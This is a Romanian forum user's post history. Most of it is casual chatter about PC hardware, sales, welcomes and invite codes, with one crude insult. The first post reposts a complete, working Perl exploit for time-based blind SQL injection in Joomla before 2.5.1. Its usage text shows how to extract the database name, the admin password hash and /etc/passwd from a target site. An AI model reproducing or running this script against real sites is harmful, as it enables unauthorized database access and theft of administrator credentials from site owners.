-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Posts posted by LLegoLLaS
-
-
File:
#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
print "$0 <url> <wait
time> <sql>\n";
print "\texamples:\n";
print "\t get admin password:\n";
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
print "\t get file /etc/passwd\n";
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope \n"; exit 1; }
my $lenoflen;
sub len {
# length of length
for (1..5) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$lenoflen = $_;
last;
}
}
for (1..$lenoflen) {
my $ll;
$ll=$_;
for (0..9) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$len .= $_;
}
}
}
return $len;
}
sub data {
my $sql = $_[0];
my $len = $_[1];
my ($bit, $str, @byte);
my $high = 128;
for (1..$len) {
my $c=8;
@byte="";
my $a=$_;
for ($bit=1;$bit<=$high;$bit*=2) {
$stime = time();
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$byte[$c]="0";
} else { $byte[$c]="1"; }
$c--;
}
$str = join("",@byte);
print pack("B*","$str");
}
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);
Copyright 2012 - BugSearch
About Us - Tell a Friend - Sendsursa: BugSearch
-
Chiar ma intrebam daca mai exista alonia.Probabil colaboram pe viitor sa vad cum mai stau cu calitatea serviciilor romanasii
-
n-o recunoaste nici shazam nici tunatic.
ps: pe asta o stie cineva?Keygen song by Mall Vollio on SoundCloud - Create, record and share your sounds for free
-
se scoate din vanzare definitiv.Close topic
-
de mers merge dar nu ti-ai ales bine componentele.Corsair 1600mhz sunt arhisuficienti.In schimb as zice sa mai pui la procesor (macar un 2300 daca nu 2400) iar motherboard zic sa mergi pe chipser P67 sau Z68
-
daca scazi ce ai spus tu si lasi doar 4gb ram = ~21 milioane
acolo is 30 mil cu tot cu hard (e luata ultima valoare cand a fost disponibil adica undeva la 380 lei)
ps: majoritatea le recomand pe emag.Wishlistul e pe pcgarage ca emagu are un site greoi
-
depinde de buget.Eu am Core i5 2400 (800lei) dar nu se poate face overclock.Daca vrei OC recomand cu caldura i5 2500k
ambele socket 1155
ps: iti recomand sistemul asta "Sistem echilibrat" - wishlist de Cipry N. (configuratia mea actuala)
-
off:m-apuc de cusut.
doar mie mi se pare WRONG?
on: ce sa zic...bafta la vanzare
-
Acum o intrebare pentru cei care isi petrec majoritatea timpului/lucreaza pe linux:
Ati putea sta pe windows acum cu powershell-ul fiind asemanator cu un shell linux (ca si comenzi vorbind)?
doar niste comenzi nu aduc windowsul la acelasi nivel cu linuxul
mere/pere
-
ce-nseamna sa intri in toate exe-urile pe care le prinzi
-
Vand Microsoft Arc Touch negru.Folosit o saptamana.Garantie 2 ani la producator,cutie completa.
Schimb cu nokia dualsim sau stickuri de 32gb (Kingston DTR500 sau echivalent).Pret negociabil.Pentru schimburi valoarea este mai mare.
Imi rezerv dreptul sa refuz o oferta si/sau sa refuz in functie de numarul/calitatea posturilor de pe forum.O sa postez si poze in curand.
-
Bun venit!Hotarastete spre un domeniu care te ajuta/iti place si incearca sa aprofundezi cat mai bine ce ti-ai propus
-
Ce atata panica?Nici alte site-uri hostate acolo n-au mers (fl,telefonultau,etc).Maintenance!
-
ii bun.merci
-
lfs.net / lfsforum.net / lfsworld.net ai?Mersi!
-
5coduri:
bY7vdznOU0dnVEAzbbqbm673QtaUboqNYYnIdLyOQ6xnaK5xS5dvWzprb6x/mzk2YbyvdL9+V+anap7rX5RiQ542V+dsV6N0YbxDdoMGW+qsazwLSad7m4McU+a5VYprSKnRma5N/Kp4ay72/oRbdbacRbxnR=/rSaBieba=Qc5cRp7uSK7IV6ncIbMnazN0bbyLdE7oaYRnmsAwbsnie6RrXtR5RKpDY65adypcYthsXoDyY=R8bbp3UEBsV=/qYsn8nEaN/j7sm0h0S4dXe67NI+qBbEnMSsninaq+V+q4RpGzSyB8n6nYacdRaLMwSLB8n=yoX55UV6dMY5WymEQ2Rta4VaSxYLdumEpS/+pCV5/N/byPmbRSbtqURo/u
Basescu e Tripat
Postati cei care le-ati folosit si/sau un like
-
S-a mai discutat pe tema asta.In unele cazuri se revine cu update asupra unui lucru ceea ce este permis.In plus,impotriva celor care fac (posturi inutile si topic-reviving) exista reguli si risca ban.
-
pe adrese de torrente?mai exact?
on: o prezentare ceva?
-
Sperii omu'
Bun venit.Ceva cunostinte?
-
Da' se poate si ban o saptamana sau cateva zile nu neaparat permanent.Eu is pro
ruleta ruseasca
-
La multi ani omule! La multi ani ...mie!
-
doar pe deasupra cu antene unidirectionale (fara obstacole) si nici asa nu cred ca e posibil pe distanta asa mare
-
n-ai sopart tu nimic.Nici siteuri nici nimic.stai cilu
-
pm cu mail
le: my bad.Ti-am dat pm cu invite code
le2: amandoi aveti doar posturi la cereri .Daca nu folosesti codul in urmatoarele 15 min il sterg
Yellow :]
in Bine ai venit
Posted · Edited by LLegoLLaS
Ce entuziasmat si ce tare se crede el .Pula mea...eu iti doresc noroc dar...
ps: te cunoaste cineva de pe scara?...ai ceva ciudat in atitutine.
''mi s-a facut dedicatie'' - sa moara dusmanii mei